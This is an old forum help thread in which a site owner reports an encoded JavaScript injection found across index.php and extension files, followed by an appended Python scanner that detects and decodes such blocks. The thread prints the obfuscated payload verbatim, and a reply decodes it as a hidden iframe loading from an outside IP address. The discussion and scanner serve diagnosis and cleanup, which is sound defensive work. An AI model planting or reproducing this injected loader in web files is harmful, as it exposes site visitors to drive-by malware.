
OMFG HAxX! possible XSS hole?

edited October 2007 in Vanilla 1.0 Help
i know i've said i was hacked before, but i think this time it's legit. today my forum was taken down by a militant javascript. i uploaded Vanilla 1.1.3 yesterday and had no problems. even solved some of my previous ones. but today my forum displayed blank. and when i viewed source i found this script repeated about 10+ times.

<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27 %44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28 %27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%61%62%38%61%36%63%64 %65%38%63%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%31%2e%32 %39%2e%32%34%31%2e%37%30%2f%6e%65%77%2f%63%6f%75%6e%74%65%72%2e %70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68 %2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%36%32%35%29%2b%27%39%63 %39%63%61%5c%27%20%77%69%64%74%68%3d%33%37%35%20%68%65%69%67%68 %74%3d%35%37%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79 %3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

i looked around in almost all the files on my server and found this script appended to my /index.php and almost all of my /extensions/*/default.php

my forum doesn't allow non-members to post, so is it a registration hole? a postbackaction hole? i'm pretty sure all of my permissions are set right. but i did have to set Nuggets to 777 to get it to write. that could have been the hole as well. any help and/or a possible fix would be great.

Comments

  • edited October 2007
    Here is what it does.
    "window.status='Done'; document.write('<iframe name=ab8a6cde8c src=\'http://81.29.241.70/new/counter.php?' +Math.round(Math.random()*215625)+'9c9ca\' width=375 height=575 style=\'display: none\'></iframe>')"
    I don't think it's an XSS. The code is injected in your source files.

    You should let your host know about that.
  • i went through and hand deleted all the occurrences of the script and got my forum back online. the only irregularity is that in Quotations(1.6)/default.php the script was injected before the php close "?>". it seems to have replaced the close with the script. and that's why the forum went blank.

    on a sidenote. does anyone here know how to hack (like 1337 h4x0r hack)? i'd like to learn so i can run my development sites through a bit of hard testing. use those powers for good and not for evil.
  • VazVaz New
    edited October 2007
    :|... see the following.
  • Here is an example with Joomla:
    http://security.immerda.ch/?p=11

    The cracker finds a way to upload a malicious file on your server and to execute it.
  • i went through and deleted all the instances. in the source. made sure all my directories were the right permissions. but the script is back. in my /extensions/*/default.php and in my /index.php. how are they doing this?
  • Do you have another application on your server? I doubt the vulnerability is from vanilla.
    Did you change your different passwords?
    Did you contact your host? Your control panel or another user on your server could have the vulnerability.
  • i have movable type on my system. but no problems there. this only shows up on my site on this server in my vanilla installation.
  • edited October 2007
    It seems to target every index.* or default.* file. Are you sure it didn't corrupt any movable type file like index.html?

    Which application allows you to upload a file on the server?
    (Also check that allow_url_fopen and register_globals php settings are not both on).

    Did you contact your host?
This discussion has been closed.
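
A defensive check for the injection described in this thread, added here as an example and not code from any poster or from Vanilla: it finds `eval(unescape("%..."))` script blocks in `index.*` and `default.*` files, decodes them without executing them, and flags blocks that sit inside an open PHP section (the Quotations case that blanked the forum). The function names and the sample payload, which uses the documentation address 192.0.2.1, are constructed for illustration.

```python
import re
import sys
from pathlib import Path
from urllib.parse import unquote

# The injected block: <script>eval(unescape("%77%69...")); </script>
INJECTED = re.compile(
    r'<script>\s*eval\(\s*unescape\(\s*"([%0-9a-fA-F\s]+)"\s*\)\s*\)\s*;?\s*</script>',
    re.IGNORECASE)
IFRAME_SRC = re.compile(r'''<iframe[^>]*\bsrc=\\?['"]?([^'"\\\s>]+)''', re.IGNORECASE)

def decode_payload(encoded):
    """Percent-decode the payload without running it; drop line-wrap whitespace."""
    return unquote("".join(encoded.split()), encoding="latin-1")

def scan_text(text):
    """Return one finding per injected block found in a file's contents."""
    findings = []
    for m in INJECTED.finditer(text):
        js = decode_payload(m.group(1))
        src = IFRAME_SRC.search(js)
        before = text[:m.start()]
        findings.append({
            "offset": m.start(),
            "decoded": js,
            "iframe_src": src.group(1) if src else None,
            # Heuristic: last "<?" has no "?>" after it, so the block sits in PHP
            # code and the file will not parse (the blank-page case).
            "inside_php": before.rfind("<?") > before.rfind("?>"),
        })
    return findings

def scan_tree(root):
    """Scan index.* and default.* files, the names the thread saw modified."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.split(".")[0] in ("index", "default"):
            found = scan_text(path.read_text(errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample, not the thread's payload; 192.0.2.1 is a documentation address.
SAMPLE_JS = "document.write('<iframe src=\\'http://192.0.2.1/c.php?\\' width=1></iframe>')"
SAMPLE = '<?php echo 1;\n<script>eval(unescape("%s")); </script>' % "".join(
    "%%%02x" % ord(c) for c in SAMPLE_JS)

if __name__ == "__main__":
    for name, found in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for f in found:
            print(name, f["offset"], f["iframe_src"], "inside PHP" if f["inside_php"] else "")
```

A file flagged `inside PHP` needs its closing `?>` checked by hand after the block is removed, and any hit means the server-side entry point still has to be found, since the thread shows the blocks returning after deletion.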